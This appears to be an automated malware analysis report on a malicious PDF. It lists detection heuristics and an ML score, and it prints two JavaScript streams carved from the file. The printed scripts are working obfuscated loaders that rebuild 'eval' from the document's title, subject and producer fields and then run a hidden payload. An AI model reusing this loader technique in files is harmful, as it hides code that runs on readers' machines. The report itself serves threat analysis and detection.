MALICIOUS
116
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript streams, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The use of String.fromCharCode in the document body and embedded scripts suggests obfuscation, a common technique for hiding malicious code. The JavaScript is likely intended to download and execute a second-stage payload, although the specific URLs or actions are not directly extractable from the provided evidence. The file's creation date and authoring application also appear unusual.
Machine Learning
- Nyx PDF Classifier malicious score 0.9998
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
/Producer (String.fromCharCode) -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0001_000.js |
pdf-javascript-stream | PDF /JS object 1 at offset 0xA | 568 bytes |
SHA-256: f5b892d57b182d12aea55788f169efa54493c2aacf8e5c149c762c7df2605281 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var date = new Date();
ybdkq='';
var q = date.getFullYear()-2007;
evo='2011s'.replace(date.getFullYear(),'hi');
bsbup=('tit2011').replace(date.getFullYear(),'le');
g=new Function('a','return t'+evo+'[a]');
var hpvo = g(bsbup);
eiqai=('sub2011').replace(date.getFullYear(),'ject');
var hcmo=g(eiqai).replace(date.getFullYear(),'al');
vvxn=g(hcmo);
nxeh='pro2011cer';
nxeh=vvxn('nxeh.replace(date.getFullYear(),"du")');
fhq=vvxn(g(nxeh));
kkif = vvxn(hpvo);
for (i = 0; i < kkif.length; i++) {
vlpbt = kkif[i];
ybdkq += fhq(vlpbt);
}
vvxn(ybdkq);
|
|||
javascript_obj0003_001.js |
pdf-javascript-stream | PDF /JS object 3 at offset 0x301 | 564 bytes |
SHA-256: 2db3aa8399fb863f689a71eadbe4c3ea890e17a008873d32d7696728fabf2795 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var date = new Date();
tnzmp='';
var q = date.getFullYear()-2007;
zlu='2011s'.replace(date.getFullYear(),'hi');
car=('tit2011').replace(date.getFullYear(),'le');
g=new Function('a','return t'+zlu+'[a]');
var qnsl = g(car);
cyw=('sub2011').replace(date.getFullYear(),'ject');
var vbrq=g(cyw).replace(date.getFullYear(),'al');
yxup=g(vbrq);
morzt='pro2011cer';
morzt=yxup('morzt.replace(date.getFullYear(),"du")');
wzz=yxup(g(morzt));
vzgb = yxup(qnsl);
for (i = 0; i < vzgb.length; i++) {
iowds = vzgb[i];
tnzmp += wzz(iowds);
}
yxup(tnzmp);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.